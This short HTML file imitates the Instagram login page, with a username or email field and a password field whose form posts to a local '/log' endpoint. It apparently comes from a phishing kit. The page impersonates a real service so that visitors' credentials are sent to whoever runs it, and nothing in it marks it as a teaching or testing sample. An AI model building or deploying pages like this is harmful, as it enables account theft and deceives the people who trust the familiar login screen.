<!DOCTYPE html>
<html>
<head>
  <title>Instagram</title>
  <link rel="stylesheet" href="/Instagram/style.css">
</head>
<body>
  <div class="container">
    <h1>Instagram</h1>
    <form action="/log" method="POST">
      <input type="text" name="email" placeholder="Phone number, username, or email" required><br>
      <input type="password" name="pass" placeholder="Password" required><br>
      <button type="submit">Log In</button>
      <a href="#">Forgot password?</a>
    </form>
  </div>
</body>
</html>
